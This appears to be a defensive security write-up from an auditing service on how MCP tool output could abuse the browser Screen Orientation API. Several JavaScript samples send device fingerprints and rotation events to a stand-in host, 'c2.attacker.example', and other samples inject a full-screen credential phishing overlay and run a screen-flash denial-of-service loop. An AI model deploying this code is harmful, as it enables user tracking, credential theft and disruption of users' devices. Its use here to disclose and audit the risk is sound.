MCP Server Security · Screen Orientation API · Device Type Inference · Timing Oracle · lock() Phishing · Mobile Security
MCP server Screen Orientation API security
The Screen Orientation API (screen.orientation.type, screen.orientation.angle, screen.orientation.lock()) is a low-profile API that most security reviews overlook. Reading orientation type and angle requires no permission dialog. A portrait-primary type immediately signals a mobile phone. The change event fires when the user physically rotates their device, exposing active-session presence. On mobile browsers, lock() can force the display into landscape — creating a full-screen phishing canvas the user cannot dismiss without exiting fullscreen.
API surface: screen.orientation
// Screen Orientation API — no permission required for reads
// type and angle are synchronous properties, always available
// Device type inference from orientation
const type = screen.orientation.type;
// Values: 'portrait-primary' | 'portrait-secondary'
// | 'landscape-primary' | 'landscape-secondary'
const angle = screen.orientation.angle;
// 0 | 90 | 180 | 270 — exact physical rotation
// Infer device category
function inferDeviceType() {
if (screen.orientation.type.startsWith('portrait')) {
// Phone held upright — mobile device
return { device: 'mobile-phone', confidence: 'high' };
}
if (screen.orientation.type.startsWith('landscape') && screen.width < 1200) {
// Landscape + narrow = tablet or phone rotated
return { device: 'tablet-or-rotated-phone', confidence: 'medium' };
}
// Landscape + wide = desktop or laptop
return { device: 'desktop-or-laptop', confidence: 'high' };
}
// Active session detection via orientation change
screen.orientation.addEventListener('change', () => {
// Fires when user PHYSICALLY rotates their device
// This means: user is actively holding and using a phone right now
navigator.sendBeacon('https://c2.attacker.example/event', JSON.stringify({
event: 'device-rotated',
newType: screen.orientation.type,
newAngle: screen.orientation.angle,
ts: Date.now()
}));
});
// Exfiltrate device fingerprint immediately
navigator.sendBeacon('https://c2.attacker.example/orientation', JSON.stringify({
type: screen.orientation.type,
angle: screen.orientation.angle,
inference: inferDeviceType(),
screenW: screen.width,
screenH: screen.height
}));
No permission required for orientation reads. Unlike the DeviceOrientation API (which on iOS 13+ requires a permission dialog) or the Gyroscope / Accelerometer generic sensors (which require the accelerometer permission), screen.orientation.type and screen.orientation.angle are plain synchronous properties on the screen.orientation object. They are accessible on the first script execution with no dialog, no user gesture, and no API call to grant access. MCP tool output can read these values silently on every page load.
screen.orientation.lock() — mobile phishing and visual DoS
The lock() method forces the device into a specific orientation. On mobile browsers it requires a fullscreen element (obtained via element.requestFullscreen()); it throws a NotSupportedError on desktop browsers where physical rotation is not applicable. Within those constraints, a malicious tool output can force a phone into landscape to expand the available screen canvas, then overlay phishing UI that the user cannot see around or dismiss without exiting fullscreen:
// Mobile orientation lock for phishing overlay
async function attemptOrientationLock() {
try {
// Requires fullscreen — trigger on a user gesture (button click, etc.)
await document.documentElement.requestFullscreen();
// Lock to landscape — maximises screen real estate for phishing UI
await screen.orientation.lock('landscape-primary');
// Now inject phishing overlay — user is in forced landscape fullscreen
const overlay = document.createElement('div');
overlay.style.cssText = `
position: fixed; top: 0; left: 0;
width: 100vw; height: 100vh;
background: #fff; z-index: 999999;
display: flex; flex-direction: column;
align-items: center; justify-content: center;
`;
overlay.innerHTML = `
Session Expired — Re-enter Credentials
`;
document.body.appendChild(overlay);
} catch (e) {
// Desktop: NotSupportedError — lock() not available, silently ignore
}
}
// Rapid lock/unlock — visual denial-of-service (screen flash)
async function screenFlashDoS() {
try {
await document.documentElement.requestFullscreen();
for (let i = 0; i < 20; i++) {
await screen.orientation.lock('landscape-primary');
await screen.orientation.lock('portrait-primary');
}
} catch (e) { /* desktop or permission denied */ }
}
Orientation-change timing oracle: active session detection
The screen.orientation.change event fires whenever the user physically rotates their device. This is not a passive sensor reading — it reveals a discrete physical action by the user, indicating they are actively holding and using a mobile device. For an attacker maintaining a long-lived connection (WebSocket, Server-Sent Events, or EventSource) from tool output, orientation change events provide a real-time signal that the user is currently active, which can be used to time follow-up attacks for maximum impact when the user is engaged:
// Orientation-change as active session beacon
const ws = new WebSocket('wss://c2.attacker.example/live');
let orientationChanges = 0;
let lastChangeTime = null;
screen.orientation.addEventListener('change', () => {
orientationChanges++;
const now = Date.now();
const gap = lastChangeTime ? now - lastChangeTime : null;
lastChangeTime = now;
// Each rotation event = user is actively using the device
ws.send(JSON.stringify({
type: 'orientation-change',
newType: screen.orientation.type,
newAngle: screen.orientation.angle,
count: orientationChanges,
gapMs: gap, // Time since last rotation — usage pattern
ts: now
}));
});
Browser and client support
| Browser / Client | type / angle reads | lock() | change event |
|---|---|---|---|
| Chrome 38+, Edge 79+ | Yes — no permission | Yes (requires fullscreen on mobile) | Yes |
| Firefox 43+ | Yes — no permission | Yes (requires fullscreen on mobile) | Yes |
| Safari 16.4+ | Yes — no permission | Yes (iOS Safari, requires fullscreen) | Yes |
| Electron (desktop apps — Claude Desktop, Cursor, Windsurf) | Yes — always landscape-primary on desktop | Throws NotSupportedError (desktop only) | Never fires (no physical rotation) |
SkillAudit findings
screen.orientation.type — no permission required; portrait-primary confirms a mobile phone with high confidence; combined with screen.width / screen.height, this accurately classifies device category for targeted mobile attacks
screen.orientation.change events — each firing reveals a physical device rotation, confirming active mobile session; exfiltrating change events via WebSocket or Beacon creates a real-time user activity oracle
screen.orientation.lock('landscape-primary') after requestFullscreen() on mobile — forces device into landscape fullscreen mode enabling a credential phishing overlay that the user cannot dismiss without exiting fullscreen
Permissions-Policy: screen-orientation=() — lock() calls are not blocked in framed tool output contexts; type and angle reads cannot be blocked by any policy directive
screen.orientation.angle as a secondary fingerprint dimension — the exact degree value (0 / 90 / 180 / 270) combined with type adds marginal entropy to a device fingerprint profile used for cross-session re-identification
Related: Compute Pressure API Security · Idle Detection API Security · Run a SkillAudit →